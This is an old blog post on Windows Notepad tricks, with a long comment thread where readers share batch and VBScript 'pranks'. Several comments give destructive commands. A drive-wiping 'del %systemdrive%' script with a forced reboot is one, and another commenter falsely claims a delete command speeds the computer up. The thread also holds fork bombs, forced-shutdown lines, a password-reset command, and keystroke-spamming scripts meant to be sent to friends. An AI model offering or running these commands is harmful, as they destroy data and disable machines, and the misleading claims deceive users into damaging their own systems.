HomeComputingWindows › Best Notepad Tricks : Amazing Notepad Tricks for Windows Oct 2009

Best Notepad Tricks : Amazing Notepad Tricks for Windows

Best Notepad Tricks  Amazing Notepad Tricks for Windows Did you know that the windows notepad was capable of doing amazing tricks apart from quick writing.

Though there are better notepad alternatives but the windows notepad is popular because of its simplicity.

Easy & Amazing Notepad Tricks – Top 5

Here are some really amazing notepad tricks which you can see in the windows notepad. Check them out right away.

#1 Bush Hid the Facts – Most Popular Notepad Tricks

This is one of the mysterious notepad tricks we know. According to the trick it really seems Microsoft had put some hack into the coding of notepad making the text hidden after saving it.

Why This Happens ? : It was later known 4335 Rule. It means that if we enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters each, and the last word has five letters. Then Notepad Automatically hides the text into unknown code. Similar are with "this app can break".

#2 World Trade Centre Attack Trick – Shocking Notepad Tricks

Did you know that the flight number of the plane that had hit WTC on 9/11 was Q33NY …

You will be amazed by the findings. Its a Plane going for 2 building shaped structures & then death.(see below)  WTF ?

World Trade Centre Trick - Shocking Notepad Tricks

Shocking … Ya …But this is a complete hoax… because I researched myself on Wikipedia and found that None of the planes involved in the 9/11 attacks had the flight number "Q33 NY". The flight numbers of the planes that crashed into the Twin Towers were in fact "11" and "175". Clearly, someone has simply made up this supposed flight number in an attempt to make the spurious claim seem valid.

#3 Famous Matrix Falling Code Effect – Cmd Notepad Tricks

In this video youtube user Z3AI0T teaches you how to create that famous "matrix falling code" effect using notepad and cmd.

The Video Creator has some more similar notepad hacks… visit his/her channel to get them.

#4 Make a Personal Log-Book / Diary with a Notepad Trick

Make a Personal Log-Book  Diary with Notepad trick Here are the simple steps to use the Windows Notepad as a simple digital diary or a personal Log-Book.

Surprisingly you can see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the the notepad file.

#5 List of Other Useful Notepad Tricks

For Notepad Lovers….

Funny Vista Notepad Comic (Image Credits)

SHARE

Post Written by


39 Responses »

Rahul : Quite interesting. I will surely try them.

neeraj : thats very nice.......

BOB : ANYONE NOW THE DISK TRAY HACK

sam : Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them! Type : Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Save it as "Anything.VBS"

Debajyoti Das : Thanks SAM for this amazing share...

joe : yo, this is awesome!

sami : try this one guys open notepad type: shutdown -s -t 55 -c lol

Kahl : dude i want to know how to make the matrix thing witht the matrix font and make it look good you know not just hella numbers and letters being repeated, but im at school so i cant see the vid on youtube even with updated proxies so if anyone can post it that would be badass thanks, you can see starwars with: telnet towel.blinkenlights.nl its funny if you have a good connection you can see it well but most of the time its slow as hell but still really cool. also i didnt se antything that said you can make a website with note pad, thats how i make mine from home, its really easy when you get the hang of it. well let me now if you find a good code with the falling matrix with the font ill have the font for download at this site: http://rapidshare.com/files/349677315/mCode15.ttf.html so thanks broski's

SHYAM : MATRIX TRIC @echo off color 2 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start SAVE IT AS matrix.bat

SAJJAD : HAI FRIEND THANKS FOR URE TRICKS SEND ME SOME NICE TRICKS TO MY GMAIL ID shaiksajjad2012@gmail.com

acidbuRN3R : Type this: @ echo off. :top. Start. Goto :top. (Its a cool trick, but save it as anything.bat) enoy!

Debajyoti Das : @ acid - Hey thats quite cool... :)

jamal : hi, i want to know about MATRIX trick i cant watch on youtube, the connection is realy slow here, so plz send me this trick, and somemores. thanks

Nitin : Plz notepad me vedio play karne ki trick batao yaar.

Isaiah : try this one open notepad then type 1.bat then for the filename type 2.bat .. open notepad then type 2.bat for the filename write 1.bat .. see what happens.. you could delete the other one as long as you save on of it ..

Isaiah : if you want to turn off your seatmates compuetr without touching it .. type to your ms.dos (comand promt) shutdown -i then yoll do the rest ..

awesome master : this is a real note pad trick its a fork bomb/rabbit virus but it a prank joke and harmless open note pad and type :s start 0% goto :s and save it as "anything.bat" then open it :P toatle lagg

VBS team : @ awesome master, Now i cannot get this error of my screen!!!!!!!! I'll terminate it in CTRL ALT DEL!!!!!!

emin : @echo off color 02 :start echo %random%%random%%random%%random%%random% echo %random%%random%%random%%random%%random% echo %random%%random%%random%%random%%random% goto start

isaac4777 : try this @echo off msg* any thing you want you can do the msg* thig as many times as you want... i think that if you put loop it will go on 4 ever.

Smart : Cool Tricks ... I tried everything ... I am surprised to check those tricks

Zeon : type this. net user 'your user name here' * HAHA HAHA save the file as a .bat enjoy

DIPESH : VERY COOL TRICKS I HVE ENJOY MANY TIMES KYA BAAT H

hi : gib rein: start start.bat start.bat save as ''start.bat'' hahahahahah

Debajyoti Das : @hi: Nice One

Abhi : 6) Hack your friend's keyboard and make him type "You are a fool" simultaneously: Type : Code: Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "You are a fool." loop Save it as "Anything.VBS" and send it.

jhon : Hi, I want to know How to make the line number by using notepad

krishna : Its very interesting tricks

Jonathon : my best one, Set wshshell = wscript.CreateObject("WScript.Shell") Wshshell.run "Notepad" wscript.sleep 400 wshshell.sendkeys "%o" wscript.sleep 200 wshshell.sendkeys "{Down}" wscript.sleep 200 wshshell.sendkeys "{Enter}" wscript.sleep 200 wshshell.sendkeys "{Tab}" wscript.sleep 200 wshshell.sendkeys "{Tab}" wscript.sleep 200 wshshell.sendkeys "3" wscript.sleep 800 wshshell.sendkeys "{Backspace}" wscript.sleep 1000 wshshell.sendkeys "7" wscript.sleep 200 wshshell.sendkeys "2" wscript.sleep 200 wshshell.sendkeys "{Enter}" wscript.sleep 400 wshshell.sendkeys "W" wscript.sleep 100 wshshell.sendkeys "a" wscript.sleep 120 wshshell.sendkeys "t" wscript.sleep 200 wshshell.sendkeys "c" wscript.sleep 140 wshshell.sendkeys "h" wscript.sleep 100 wshshell.sendkeys " " wscript.sleep 100 wshshell.sendkeys "T" wscript.sleep 200 wshshell.sendkeys "{backspace}" wscript.sleep 1000 wshshell.sendkeys "t" wscript.sleep 100 wshshell.sendkeys "h" wscript.sleep 150 wshshell.sendkeys "e" wscript.sleep 170 wshshell.sendkeys " " wscript.sleep 200 wshshell.sendkeys "C" wscript.sleep 100 wshshell.sendkeys "A" wscript.sleep 50 wshshell.sendkeys "P" wscript.sleep 120 wshshell.sendkeys "S" wscript.sleep 160 wshshell.sendkeys " " wscript.sleep 200 wshshell.sendkeys "L" wscript.sleep 100 wshshell.sendkeys "i" wscript.sleep 160 wshshell.sendkeys "{backspace}" wscript.sleep 1000 wshshell.sendkeys "o" wscript.sleep 100 wshshell.sendkeys "c" wscript.sleep 200 wshshell.sendkeys "k" wscript.sleep 120 wshshell.sendkeys "!" wscript.sleep 400 wshshell.sendkeys "!" wscript.sleep 400 wshshell.sendkeys "!" wscript.sleep 400 Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 300 wshshell.sendkeys "{CAPSLOCK}" Set wshShell =wscript.CreateObject("WScript.Shell") loop

h@X0roo7 : You all are just kidding....

Rajesh : Helo every1, can n e one of u tel me how to lock keyboard using easy trick.?? thanx in advance

Hellow : any one know the one were you set a number and then a window comes up and you have to click what ever number you set to get rid of it (or task manager). anyone know that one?

sahir khan : nice

sahir khan : try this !!! @echo off :A color 9 pause color 3 pause color 2 pause color 8 pause color 5 pause color 1 pause color 4 pause color 7 pause color 6 pause goto A

nixk : ok so do this 1 it uses a cp voice and btw i know all notepad hacks and tricks if u want any just ask and here it is do strtext=("ur message here") set objvoice = createobject ("sapi.spvoice") objvoice.speak strtext x =msgbox ("popup message",1,"popup title") loop hope u like it and email if u want more bc i made more than 200 om my cp or diff tecniges but i have more than 50 diff things u can do with it :) cya

RAA THE MYSTERY : tell me about how to blast monitor with notepad ?

Big Badsha : @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 guys dont try this to your comp bcoz its a very destructive virus... ;-)

H4X0|2 : try: @echo off del C:/ del %systemdrive% it make your computer realy fast try :) i'v done it it works it works by del unused file's good hey, it's pro

gaming lagoon 8,100 : Thank you for the good writeup. It in truth was once a entertainment account it. Look advanced to more delivered agreeable from you! By the way, how could we keep up a correspondence?

» Leave a Reply